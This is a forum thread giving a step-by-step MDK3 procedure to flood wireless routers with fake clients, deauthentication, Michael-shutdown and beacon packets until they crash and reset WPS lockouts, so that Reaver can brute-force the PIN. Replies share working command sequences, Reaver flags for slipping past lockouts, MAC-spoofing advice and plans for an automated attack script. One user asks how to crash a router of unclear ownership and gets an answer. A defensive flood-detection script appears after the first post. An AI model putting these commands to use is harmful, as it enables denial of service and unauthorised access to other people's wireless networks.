
Thread: MDK3 Secret Destruction Mode

  1. #1
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520

    How to Reset WPS Lockouts Using MDK3

    Use at your own risk! Section 638:17 of the New Hampshire House Bill 495 highlights United States rules against wireless hacking. Attempting to gain, or gaining, access to a network that you do not own or have permission to access is STRICTLY forbidden. I am NOT responsible for ANYTHING you do with this information.

    The purpose of this guide is to inform users about how a router can be exploited to temporarily reset WPS lockouts. This can be useful when using reaver to crack a WPS pin. Keep in mind that this does not work with every router; it largely depends on hardware. This attack uses MDK3, a set of tools by ASPj, to overload the target AP with useless data, thus causing it to freeze and reset. Here is how it works. (Each of these commands is run in a separate terminal window, and I think you can figure out the variables here.)

    Code:
    mdk3 monX a -a xx:xx:xx:xx:xx:xx -m
    This floods the target AP with fake clients.

    Code:
    mdk3 monX m -t xx:xx:xx:xx:xx:xx
    This causes Michael failure, stopping all wireless traffic. However, this only works if the target AP supports TKIP. (Can be AES+TKIP)

    Code:
    mdk3 monX d -b blacklist -c X
    This keeps a continuous deauth on the network. If this attack does not start, make a blank text document in your root folder named blacklist. Leave it empty as MDK3 automatically populates the list.

    Code:
    mdk3 monX b -t xx:xx:xx:xx:xx:xx -c X
    This floods a bunch of fake APs to any clients in range (only effective against Windows clients and maybe some other devices; Macs are protected against this).

    You will know when the AP has reset either by checking with

    Code:
    wash -i monX -C
    or if the target shows channel -1 and MB shows -1 in airodump.

    Please do NOT use this on a network that is not yours or that you do not have permission to. If the owner finds out that it is you who is attacking their network, you may end up in serious legal trouble.

    Visit ASPj's site as mentioned above for more information.

    Preventing the attack

    As of now, there is no way to prevent the attack except by disabling wireless, buying a high end router, or getting an AP that encrypts management packets. Deauthentication packets are management frames which are sent UNENCRYPTED unless you purchase an AP that supports MFP. You can read more about this here.

    Downloads for useful programs: I will do my best to keep these updated

    Atrophy

    ReVdk3-r1

    FrankenScript 2
    Last edited by soxrok2212; 2014-07-14 at 12:26.
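A rate-based detection for the three management-frame floods described above (authentication flood, deauthentication flood, beacon flood), written from the defender's side as an added example that is not part of the original post or of MDK3; the thresholds, the MgmtFrame record shape and the sample traffic are constructed assumptions, not output of any tool.

```python
"""
Rate-based detector for the 802.11 management-frame floods the post describes:
authentication flood (mdk3 a), deauthentication flood (mdk3 d) and beacon
flood (mdk3 b). It works on already-decoded frame records, the form a WIDS
sensor or a pcap decoder would hand over; nothing is captured or transmitted.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Per-one-second thresholds. These are assumed starting values; tune them to
# the site's own baseline before alerting on them.
AUTH_FRAMES_PER_S = 30            # total auth requests aimed at one BSSID
AUTH_DISTINCT_SRC_PER_S = 15      # distinct stations authenticating to one BSSID
DEAUTH_PER_S = 10                 # deauth frames carrying one BSSID
BEACON_DISTINCT_BSSID_PER_S = 25  # distinct BSSIDs beaconing at once


@dataclass(frozen=True)
class MgmtFrame:
    ts: float       # capture timestamp in seconds
    subtype: str    # "auth", "deauth" or "beacon"
    src: str        # transmitter address (SA)
    bssid: str      # BSSID of the AP the frame belongs to


def detect_floods(frames: List[MgmtFrame]) -> Dict[str, List[dict]]:
    """Bucket frames into one-second windows and return alerts per flood type."""
    auth_total = defaultdict(int)       # (bssid, window) -> auth frame count
    auth_src = defaultdict(set)         # (bssid, window) -> distinct sources
    deauth_total = defaultdict(int)     # (bssid, window) -> deauth frame count
    beacon_bssids = defaultdict(set)    # window -> distinct BSSIDs seen

    for f in frames:
        w = int(f.ts)
        if f.subtype == "auth":
            auth_total[(f.bssid, w)] += 1
            auth_src[(f.bssid, w)].add(f.src)
        elif f.subtype == "deauth":
            deauth_total[(f.bssid, w)] += 1
        elif f.subtype == "beacon":
            beacon_bssids[w].add(f.bssid)

    alerts = {"auth_flood": [], "deauth_flood": [], "beacon_flood": []}
    # An mdk3 a run without -m sends every request from 00:00:00:00:00:00, so
    # the distinct-source count stays at 1; the raw frame count catches that.
    for (bssid, w), n in sorted(auth_total.items()):
        distinct = len(auth_src[(bssid, w)])
        if n >= AUTH_FRAMES_PER_S or distinct >= AUTH_DISTINCT_SRC_PER_S:
            alerts["auth_flood"].append(
                {"bssid": bssid, "window": w, "frames": n, "distinct_src": distinct})
    for (bssid, w), n in sorted(deauth_total.items()):
        if n >= DEAUTH_PER_S:
            alerts["deauth_flood"].append({"bssid": bssid, "window": w, "frames": n})
    for w, bssids in sorted(beacon_bssids.items()):
        if len(bssids) >= BEACON_DISTINCT_BSSID_PER_S:
            alerts["beacon_flood"].append({"window": w, "distinct_bssid": len(bssids)})
    return alerts


def build_sample() -> List[MgmtFrame]:
    """Constructed sample traffic: one quiet second, then two seconds under attack."""
    ap = "02:00:00:00:00:01"          # constructed BSSID of the monitored AP
    frames: List[MgmtFrame] = []
    # Second 0: normal. Ten beacons (one per ~100 ms) and two real client logins.
    for i in range(10):
        frames.append(MgmtFrame(0.0 + i * 0.1, "beacon", ap, ap))
    frames.append(MgmtFrame(0.25, "auth", "02:00:00:00:00:10", ap))
    frames.append(MgmtFrame(0.70, "auth", "02:00:00:00:00:11", ap))
    # Second 1: auth flood with the all-zero source, plus a deauth flood.
    for i in range(40):
        frames.append(MgmtFrame(1.0 + i * 0.02, "auth", "00:00:00:00:00:00", ap))
    for i in range(12):
        frames.append(MgmtFrame(1.0 + i * 0.05, "deauth", ap, ap))
    # Second 2: beacon flood, 30 never-seen BSSIDs inside one second.
    for i in range(30):
        fake = "02:00:00:00:01:%02X" % i
        frames.append(MgmtFrame(2.0 + i * 0.03, "beacon", fake, fake))
    return frames


if __name__ == "__main__":
    for kind, hits in detect_floods(build_sample()).items():
        print(kind, hits)
```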

  2. #2
    Join Date
    2013-Jul
    Posts
    844
    This is great!!! We have been looking for a way to reset WPS locked routers remotely, and our team will be happy to write a script for you; however, a few questions.

    1. You are running the mdk3 a b d and m command lines in four different windows all at the same time - is this correct?

    2. Your comment "You can also add -m to the end of this so it uses real mac addresses instead of 00:00:00:00:00:00."

    Does that deal with the "a" attack above OR the "d" attack below?

    This should be easy to write: just airodump-ng and four Eterm terminal windows. We already have a DDOS program written to use with pwnstar that runs the a and g and airodump-ng commands. We will drop all our other projects with easy-cred and focus on this. However, be aware that a reset WPS router is only going to give you ten keys before it locks up. Anyway, we will run some tests and have something back to you in a few weeks. Anyway, this is better than trying to brute force a long key.

    Again THANKS!!!!!

    Musket Team Alpha

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    1- Yes, ultimately you should have a total of 5 windows open at the same time:
    1- airodump
    2- mdk3 a
    3- mdk3 b
    4- mdk3 d
    5- mdk3 m

    2- You can add -m after mdk3 a. This will authenticate real mac addresses instead of 00:00:00:00:00:00. HOWEVER, with my Alfa AWUS036H, airodump stops working unless I close the terminal window and rerun the command.

    *I updated the tutorial to hopefully solve future questions*

    I could also do some testing with you after you guys push out this tool; I'm excited to see what we can do!
    Last edited by soxrok2212; 2013-12-07 at 14:48.

  4. #4
    Join Date
    2013-Jul
    Posts
    844
    Reference your comment about airodump-ng: we know there is an issue with airodump-ng in a kali-linux install, as airodump-ng will freeze randomly in all our computers occasionally. But the issue is so random we do not know how to even approach the problem.

    We will send you a working copy so you can check the command lines and make suggestions. We ran some tests yesterday but they were inconclusive as it was against a CCMP encrypted router.

  5. #5
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    If you would like to send me what you have now, I can run some tests against TKIP...
    Last edited by soxrok2212; 2013-12-09 at 20:35.

  6. #6
    Join Date
    2013-Jul
    Posts
    844
    We do not see a way to send you the script. We do not want to post an incomplete script for general use.

  7. #7
    Join Date
    2013-Jul
    Posts
    844
    To soxrok2212

    The mdk3 part of the script is completed and ready for you to test and correct. We have run it against CCMP WPS locked routers. We first turned on the WPS locking by requesting pins. After ten pins received, the router locked. We then gave the router a quad blast with mdk3 in four Eterm windows as you suggested. It seems to freeze the router BUT if it reset, the WPS locking did not reset with the router. We know that after a power failure all the WPS locking resets to off in our area.

    The airodump-ng problem seems to be related to computer speed. On the same computer using HD install of kali-linux, airodump-ng would freeze within a minute or two. If reset it would run and then eventually freeze again. With a 16gb usb persistent install of kali-linux airodump-ng froze within seconds.

    Your comments concerning the -r command may have merit BUT against the routers in our areas of operation time between pin request and mac codes requesting these pins has no relationship to the locking. The locking occurs after ten successful pin requests from any source.

    The varmacreaver.sh program available for download in these forums was originally developed to explore time between pin request versus mac codes requesting said pins. We explored this approach extensively. However, our targets are only one make of router. The program sat on the shelf for six months until we discovered a use for it.

    MTA/MTB

  8. #8
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33
    To soxrok2212

    The mdk3 part of the script is completed and ready for you to test and correct. We have run it against CCMP WPS locked routers. We first turned on the WPS locking by requesting pins. After ten pins received, the router locked. We then gave the router a quad blast with mdk3 in four Eterm windows as you suggested. It seems to freeze the router BUT if it reset, the WPS locking did not reset with the router. We know that after a power failure all the WPS locking resets to off in our area.

    The airodump-ng problem seems to be related to computer speed. On the same computer using HD install of kali-linux, airodump-ng would freeze within a minute or two. If reset it would run and then eventually freeze again. With a 16gb usb persistent install of kali-linux airodump-ng froze within seconds.

    Your comments concerning the -r command may have merit BUT against the routers in our areas of operation time between pin request and mac codes requesting these pins has no relationship to the locking. The locking occurs after ten successful pin requests from any source.

    The varmacreaver.sh program available for download in these forums was originally developed to explore time between pin request versus mac codes requesting said pins. We explored this approach extensively. However, our targets are only one make of router. The program sat on the shelf for six months until we discovered a use for it.

    MTA/MTB
    Ok, send me a private message sometime and I'll give you an email to send the beta to. Good work by the way and I'll do some testing.

  9. #9
    Join Date
    2013-Jul
    Posts
    844
    To soxrok2212
    We have spent two hours trying to send you the link where you can access the file. We have given up. We keep getting error messages. Maybe if you send me a message I can reply back to you with the link.

  10. #10
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33
    To soxrok2212
    We have spent two hours trying to send you the link where you can access the file. We have given up. We keep getting error messages. Maybe if you send me a message I can reply back to you with the link.
    Here's my old e-mail: [email protected]

    You can send it there if you'd like.

    *I don't care if it gets spammed because I don't use it*
    Last edited by soxrok2212; 2013-12-11 at 15:42.

  11. #11
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Awesome work on the script! I've got some work to do tonight, but I'll do some testing tomorrow! Looks great!

  12. #12
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Just did some testing... here are some notes:

    Bugs
    -Airodump does not correctly display networks... I only see the network (which it's really not picking up any beacons from) when I auth

    Questions
    -When the mac address is changed, does it change mon0 mac address also?

    Suggested Features
    -Implementation with reaver and auto detection of locks requiring reboot (or that may take hours at a time) to have it do this all automatically. (This can come later)

    -Automatic network discovery, ex: how wifite allows users to choose networks and input the mac address and channel automatically by choosing 1,2,3 etc as the number of the network.

    -Stop the attacks after term windows are shut, then automatically disconnect and reconnect adapter (don't know if this is possible due to whether the card is USB or built in etc).

    -Enter a number to select which interface to put into monitor mode (helps for beginners) and which to use for the actual attack.

    -Make Beacon flood and Deauth optional.... have the script check for clients before the attack.

    Changes
    -Changed a few words around.

    -Removed -c option from deauth.

    Other

    Where can we share updated scripts for this? (Don't start any changes before you get my updated copy)

    Looks good so far!... other than a few bugs!
    Last edited by soxrok2212; 2013-12-12 at 23:53.

  13. #13
    Join Date
    2013-Jul
    Posts
    844
    You can send it to my e-mail. Or read my mail I outline another quicker way of sending it to me.

    1. We will do nothing till we receive your edited version.
    2. Making Beacon flood optional will only take us five minutes.
    3. The mon0 mac address will change BUT we will test this again in our lab to confirm.
    4. The implementation of reaver into the program will only be done once you prove that you can reset the router and the WPS pin settings are reset as a result. As mentioned, routers in our area that are WPS locked do not unlock the WPS system and/or we cannot reset the router. If you see one router reset its WPS system after using routerreset.sh, tell us and we will outline what we need from you to test further.
    5. On shutting down the Eterm windows: the script file terminal window stays live in the background after loading all Eterms. When you are ready to shut down the Eterm windows you can go to that terminal window and follow the instructions. We are working on why the program continues to send beacon flood after you shut it down. But right now you have to unplug the receiver. We ran into this with varmacreaver.sh so I think we might be able to master that.

    6. -Automatic network discovery - Sorry, we do not understand.
    7. -Enter a number to select which interface - Note programmers 10 times better than us, like the writers of pwnstar9.0, leave this input as a manual keyboard entry. We have seen attempts to automate the process. Weakenet Labs has a few routines but there are always glitches. Since the mon0 entry is so critical we think manual entry is better. We might look into some error handling routines.
    8. Finally, airodump-ng. We will look into this; we did not see any problems except that airodump-ng froze. As a matter of interest, have you updated your aircrack-ng? There is a new version as of around 1 Dec 2013. Try apt-get install aircrack-ng

  14. #14
    Join Date
    2013-Jul
    Posts
    844
    1. We have solved the airodump-ng freezing problem by adjusting mdk3 command lines.
    2. We have written routines to clear everything on shutdown.
    3. We added a routine to select Beacon Flood Mode.
    4. We added a routine to add WPA downgrade if Beacon Flood was not used.
    Program no longer hangs; we ran it for an hour and airodump-ng ran smoothly.

  15. #15
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Ok, I'll send you an updated copy... I put a random name for the project... let me know if you like it.

    Yes, I have updated aircrack-ng to 1.2. When airodump is running, I don't get any beacons from the router so it shows the channel and MB as -1, along with the SSID as <length=0>. I unplugged the adapter and ran the commands manually and it worked so I'm sure its just a small bug somewhere.

    *WPA downgrade simply sends deauth packets to the AP to see if the admin will try changing the security... it's essentially the same thing as aireplay-ng deauthing or mdk3 d*

    Also, what I mean by auto network discovery is have the script run airodump to find all networks in the area, and then assign them to a number so the user can simply type in the corresponding number to automatically put in the mac address and channel.
    Last edited by soxrok2212; 2013-12-13 at 20:07.

  16. #16
    Join Date
    2013-Dec
    Posts
    7
    This is exactly what I was looking for... I have one minor issue however... the router I am dealing with is WPA2-PSK; how would I go about crashing that?

  17. #17
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by korn16ftl3
    This is exactly what I was looking for... I have one minor issue however... the router I am dealing with is WPA2-PSK; how would I go about crashing that?
    Your best bet would be to use the authentication flood and let it run for a fair amount of time. The beacon flood may also be helpful if there are clients along with a constant deauth.

  18. #18
    Join Date
    2013-Dec
    Posts
    7
    Quote Originally Posted by soxrok2212
    Your best bet would be to use the authentication flood and let it run for a fair amount of time. The beacon flood may also be helpful if there are clients along with a constant deauth.
    So as a note to share... I followed this step by step on a WPA2-PSK Belkin router. It didn't reboot the router, but it did however cause it to apparently panic because of the attack and switch channels?

  19. #19
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by korn16ftl3
    So as a note to share... I followed this step by step on a WPA2-PSK Belkin router. It didn't reboot the router, but it did however cause it to apparently panic because of the attack and switch channels?
    Did you verify this with wash?

  20. #20
    Join Date
    2013-Dec
    Posts
    7
    Quote Originally Posted by soxrok2212
    Did you verify this with wash?
    Yes, and it was locked and on channel 1 before I DoS'd the **** out of it. About 3 hours later I ran airmon-ng to see if the AP was still there or if anything had changed, and it was on channel 11. I ran wash -i wlan0 and it was unlocked once again.

    EDIT ADDITIONAL INFORMATION TO ADD:

    So today I was in Walmart looking at routers. I looked at a Belkin N300 and looked at the back (this is a lower end Belkin model router) and noticed it had a "self heal" feature to detect issues and apparently resolve them. My theory is that if lower end Belkin routers have a "self heal" feature, so must the higher end routers, and that it was this feature that 1) switched channels when I flooded the router using the attack mentioned in the OP and 2) in the process of changing channels also reset the WPS lock, as either part of the channel changing process or as part of the "self heal" feature of the router.

    Any thoughts or feed back on this concept?

    It would be really interesting to have something written up so that once the WPS lock takes place you can press a key combination to switch to a DoS attack to flood the AP and cause it to "self heal"; or, reaver is open source last I checked, have an added option to DoS every 10 pin attempts, as it was previously mentioned routers will WPS lock after 10 failed WPS attempts.
    Last edited by korn16ftl3; 2013-12-20 at 18:54.

  21. #21
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Belkin's self heal feature simply scans for all nearby APs and changes the channel once a week to minimize interference, along with clearing the routing tables. What is the model of the router you are attempting to take down?

  22. #22
    Join Date
    2013-Dec
    Posts
    7
    Quote Originally Posted by soxrok2212
    What is the model of the router you are attempting to take down?

    That I'm not sure of; it was a badly abused router, all the labels peeled off and cracked housing. It just happened to work, or seem to work, so I decided to learn some pen testing as it was something that I have always had an interest in. I have played with WEP a little but never WPA/WPA2, so I decided to learn something new.

  23. #23
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Can you log into the router's web interface? The model number should be on the first page.

  24. #24
    Join Date
    2013-Dec
    Posts
    5
    I tried mdk3 mon0 a -a 11:22:33:44:55:66 against a WPS locked router.

    Currently, more than one million (1,000,000 clients) are connected but the router is INVULNERABLE.

    Airodump-ng mon0 shows a massive number of clients connected to the AP.

    I also then tried in a separate terminal:

    mdk3 mon0 b -t 11:22:33:44:55:66

    This did not seem to help matters. 487 packets were sent at a speed of 2 packets per second.

    Any ideas? I am using a BTHub3 router.

  25. #25
    Join Date
    2013-Dec
    Posts
    5
    To edit the previous post;

    The number of packets per second sent by mdk3 m ranged from 2 per second to about 70 per second.

  26. #26
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by bad_bobby
    I tried mdk3 mon0 a -a 11:22:33:44:55:66 against a WPS locked router.

    Currently, more than one million (1,000,000 clients) are connected but the router is INVULNERABLE.

    Airodump-ng mon0 shows a massive number of clients connected to the AP.

    I also then tried in a separate terminal:

    mdk3 mon0 b -t 11:22:33:44:55:66

    This did not seem to help matters. 487 packets were sent at a speed of 2 packets per second.

    Any ideas? I am using a BTHub3 router.
    Did you replace 11:22:33:44:55:66 with the router's mac address?

  27. #27
    Join Date
    2013-Dec
    Posts
    5
    Quote Originally Posted by soxrok2212
    Did you replace 11:22:33:44:55:66 with the router's mac address?
    Yes, I just put the fake MAC for privacy purposes.

    Also, in the second window I used the 'm' command while simultaneously running the 'a' command.

    (I missed out the 'm' in the previous post).

  28. #28
    Join Date
    2013-Dec
    Posts
    5
    Wow!

    This actually works.

    I had a locked router and the commands from the first post unlocked it (and moved it to a different channel).

    These commands worked for me in this order:

    Monitor mode:

    airmon-ng start wlan1 [or whatever your wlan is]

    Mdk3:

    sudo mdk3 mon0 a -a 00:11:22:33:44:55 -m
    sudo mdk3 mon0 b -a 00:11:22:33:44:55 -n " name_of_AP" -h -c [no of channel]
    sudo mdk3 mon0 d -a 00:11:22:33:44:55 -c [no of channel]
    sudo mdk3 mon0 m -t 00:11:22:33:44:55

    Then test with:

    sudo wash -i mon0 -C

    Thanks so much soxrox!

    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options, based on people's experiences, that reduce the likelihood of a lockout.

  29. #29
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by bad_bobby
    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options, based on people's experiences, that reduce the likelihood of a lockout.
    I usually run reaver like this:

    Code:
    reaver -i mon0 -c x -b xx:xx:xx:xx:xx:xx -vv -a -S -N -E
    Sometimes, (like I said earlier), add this to the end:

    Code:
    -r x:y
    Where x = number of attempts and y = delay after x number of attempts, so -r 2:300 would try 2 pins every 5 minutes.

    The other variables in the command mean this:

    -a Auto select some advanced features.

    -S Use small Diffie-Hellman keys (reduces strain on the router).

    -N No nacks, just speeds things up a bit.

    -E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.

    Other than this, there is really no way to prevent the locks.
    Last edited by soxrok2212; 2013-12-27 at 22:28.

  30. #30
    Join Date
    2013-Nov
    Posts
    24
    Quote Originally Posted by bad_bobby
    I tried mdk3 mon0 a -a 11:22:33:44:55:66 against a WPS locked router.

    Currently, more than one million (1,000,000 clients) are connected but the router is INVULNERABLE.

    Airodump-ng mon0 shows a massive number of clients connected to the AP.

    I also then tried in a separate terminal:

    mdk3 mon0 b -t 11:22:33:44:55:66

    This did not seem to help matters. 487 packets were sent at a speed of 2 packets per second.

    Any ideas? I am using a BTHub3 router.

    Mine also reported "INVULNERABLE". I have a Netgear WNDR3400 N600. I was running the attacks and it looked like nothing happened... but then I woke up today and the router was dead. Had to do a hard reboot to get it back up. I don't know if maybe the router has some huge cache/buffer and just needed to catch up, or my internet dropped off for some reason. Thought it was noteworthy to share. Was at least 8 hrs since the "attack" though... would be cool if the former was true though!
    Visit my blog! PenTesting for Amateurs, by Amateurs -- Request your own tutorial, or send one to me to post.
    "thevanoutside" a Wordpress Blog!

  31. #31
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by polyphemus
    Mine also reported "INVULNERABLE". I have a Netgear WNDR3400 N600. I was running the attacks and it looked like nothing happened... but then I woke up today and the router was dead. Had to do a hard reboot to get it back up. I don't know if maybe the router has some huge cache/buffer and just needed to catch up, or my internet dropped off for some reason. Thought it was noteworthy to share. Was at least 8 hrs since the "attack" though... would be cool if the former was true though!
    Yeah, they are higher end routers, I have one too, a V1 and V2 and only crashed the V1 within a reasonable amount of time. It really depends on the hardware. Glad to see it worked though!

  32. #32
    Join Date
    2013-Dec
    Posts
    11

    Quote Originally Posted by bad_bobby
    Wow!

    This actually works.

    I had a locked router and the commands from the first post unlocked it (and moved it to a different channel).

    These commands worked for me in this order:

    Monitor mode:

    airmon-ng start wlan1 [or whatever your wlan is]

    Mdk3:

    sudo mdk3 mon0 a -a 00:11:22:33:44:55 -m
    sudo mdk3 mon0 b -a 00:11:22:33:44:55 -n " name_of_AP" -h -c [no of channel]
    sudo mdk3 mon0 d -a 00:11:22:33:44:55 -c [no of channel]
    sudo mdk3 mon0 m -t 00:11:22:33:44:55

    Then test with:

    sudo wash -i mon0 -C

    Thanks so much soxrox!

    The next question is: what are the optimal settings for preventing routers from locking in the first place.

    Here is one idea - see the very last paragraph (http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29) but there must be other suggestions.

    What I am looking for is a series of reaver options, based on people's experiences, that reduce the likelihood of a lockout.
    Same situation here: authentication flood alone does nothing, but combined with the b, d and m commands it broke the router in a few minutes and unlocked it.

  33. #33
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by VinnyG
    Same situation here: authentication flood alone does nothing, but combined with the b, d and m commands it broke the router in a few minutes and unlocked it.
    Glad to know it worked!

  34. #34
    Join Date
    2013-Jul
    Posts
    844
    To soxrox

    We have had success with a new WPA2 CCMP router in our surrounding wifi mix. We used mdk3 a g d m (we did not use beaconflood mode). The mdk3 alpha mode would run up to approx 11000 and rest. We thought this was the fault of mdk3 gamma and turned it off, BUT what was actually occurring was the router was resetting. We then ran wash from a terminal window and the WPS was open. Resetting the router took about a minute or two. So THIS DEFINITELY WORKS on a router to router basis. We will send you router mac code data by e-mail. We used a slightly rewritten version6 which we call version6a and left the -m code in and just let airodump-ng freeze, then removed it manually during the attack.

  35. #35
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    To any followers of this thread, we are working on a semi-automated script that does all the commands for you, but you just have to tell it when you think the router crashed (simply type one letter). Will have another update and hopefully public release soon.

  36. #36
    Join Date
    2013-Mar
    Location
    West Virginia
    Posts
    98
    Quote Originally Posted by soxrok2212
    To any followers of this thread, we are working on a semi-automated script that does all the commands for you, but you just have to tell it when you think the router crashed (simply type one letter). Will have another update and hopefully public release soon.
    Is there any way I/someone can test the current script you have atm? I'm not good with coding but I do have a few routers I could use it on.
    Smile while you can, for in the future there may be nothing to smile about.

  37. #37
    Join Date
    2013-Nov
    Location
    the state of oppression
    Posts
    16
    Sounds like a useful script imo.

  38. #38
    Join Date
    2013-Nov
    Location
    the state of oppression
    Posts
    16
    Does anyone have any recommendations for quality WPS enabled routers? I have a D-Link without WPS and have nothing to test on.

  39. #39
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by soxrok2212
    To any followers of this thread, we are working on a semi-automated script that does all the commands for you, but you just have to tell it when you think the router crashed (simply type one letter). Will have another update and hopefully public release soon.
    Sounds good, I'm very interested to see it and test it out.
    I can't script to save my life lol, saying that though I've managed to put together my first ever script, It took me ages and nearly cost me all my hair! LOL

    Keep up the great work guys.

  40. #40
    Join Date
    2014-Jan
    Posts
    2
    I found an interesting bash script called TimedReaver.sh that combines mdk3 and reaver (aireplay-ng) in a time-intervalled loop. Check here: http://moppleit.dk/ScriptsCodes.aspx Please tell if it works for someone.

  41. #41
    Join Date
    2013-Jul
    Posts
    844
    We looked at the script. It uses mdk3 alpha against the router only. If you use it do not try and spoof your mac with this program. Reaver requires different mac spoof handling.

  42. #42
    It is great and useful!

  43. #43
    Join Date
    2013-Mar
    Location
    where you can hear the silence
    Posts
    6

    BTHub3 router

    Quote Originally Posted by bad_bobby
    I tried mdk3 mon0 a -a 11:22:33:44:55:66 against a WPS locked router.

    Currently, more than one million (1,000,000 clients) are connected but the router is INVULNERABLE.

    Airodump-ng mon0 shows a massive number of clients connected to the AP.

    I also then tried in a separate terminal:

    mdk3 mon0 b -t 11:22:33:44:55:66

    This did not seem to help matters. 487 packets were sent at a speed of 2 packets per second.

    Any ideas? I am using a BTHub3 router.
    bad_bobby, I have successfully reset a BTHub3 router last year with the only command mdk3 mon0 a -a XX:XX:XX:XX:XX:XX. Just make sure you are close enough to your router, otherwise it won't work, my friend; it has to be -50 and down, so -40 is better than -50 or -60. The closer you are, the better the chance of success.

  44. #44
    Join Date
    2014-Jan
    Posts
    7
    Well, I'm using the same method (mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -m), but after 3 restarts the router freezes. The router is a TP-Link model WR740N. How can I prevent this freeze?

  45. #45
    I am trying to reboot a netgear CG3101D aka VM Superhub using the commands from the 1st page without any success regardless of how many clients are connected.

    All I get is "AP seems to be invulnerable"; in airodump it shows only 5 clients are connected and the power fluctuates between 50 and 58.

    I have tried cracking this with wifite, reaver and bully without any success unless I specify the pin in either reaver or bully so I assumed it was locking up without reporting it.

    Anyone have any suggestions?

    Rab.

  46. #46
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by flyinghaggis
    I am trying to reboot a netgear CG3101D aka VM Superhub using the commands from the 1st page without any success regardless of how many clients are connected.

    All I get is "AP seems to be invulnerable"; in airodump it shows only 5 clients are connected and the power fluctuates between 50 and 58.

    I have tried cracking this with wifite, reaver and bully without any success unless I specify the pin in either reaver or bully so I assumed it was locking up without reporting it.

    Anyone have any suggestions?

    Rab.
    Have you added the -m switch to mdk3 a? So

    Code:
    Mdk3 mon0 a -a 00:11:22:33:44:45 -m
    That will use real Mac addresses instead of just 00:00:00:00:00:00.

    And I assume you're running all 4 commands... Correct?

    Also, what security type is the router using?

  47. #47
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by BadFollower
    It may actually be your card freezing from all the simultaneous commands pushing data from it. Also, the router may just be frozen and need a manual reboot.
    Last edited by soxrok2212; 2014-01-10 at 01:15.

  48. #48
    Quote Originally Posted by soxrok2212
    Have you added the -m switch to mdk3 a? So

    That will use real Mac addresses instead of just 00:00:00:00:00:00.

    And I assume you're running all 4 commands... Correct?

    Also, what security type is the router using?
    Originally, I tried this without the -m switch, but when it appeared I wasn't having any luck I changed it to include the switch.

    Yes, you are correct, I am using all 4 commands, and the router is set to WPA auto for the security; in airodump it is reported as
    WPA2 CCMP PSK.
    Reaver and bully just seem to bypass the pin (1st 4 digits) as if the router is reporting it as wrong when the opposite is correct, hence my theory
    that the router is locking up without reporting it.
    Last edited by flyinghaggis; 2014-01-10 at 06:10. Reason: Security Update

  49. #49
    Join Date
    2013-Nov
    Posts
    4
    Hi!!!

    Kali 3.12

    MDK3 doesn't work....

    Connecting Client: 00:00:00:00:00:00 to target AP: D8:FE:E3:08:XX:XX
    Connecting Client: 00:00:00:00:00:00 to target AP: D8:FE:E3:08:XX:XX
    AP D8:FE:E3:08:XX:XX seems to be INVULNERABLE!
    Device is still responding with 500 clients connected!
    Connecting Client: 00:00:00:00:00:00 to target AP: D8:FE:E3:08:XX:XX
    AP D8:FE:E3:08:XX:XX seems to be INVULNERABLE!

    Use Alfa ....036H

    Connecting Client: 00:00:00:00:00:00 No clients to connection ...


    Who can help?

  50. #50
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I've had a Netgear router that doesn't report lockouts, but it still blocks WPS connections. If you can log into the router's webpage, 192.168.1.1, go under advanced setup, and then wireless settings, and scroll down to see if it says something like "Lock WPS after X failed attempts". If it says that it's locked in the admin webpage but not in wash, it really is locked, but the router just doesn't report it in its beacon frames. It could be that the router blacklists your mac address after a certain amount of pin requests, though it is HIGHLY unlikely. Try spoofing your mac address after a failed attempt and if this works, I can direct you to a program that automates this process. Good luck and I hope I made sense!
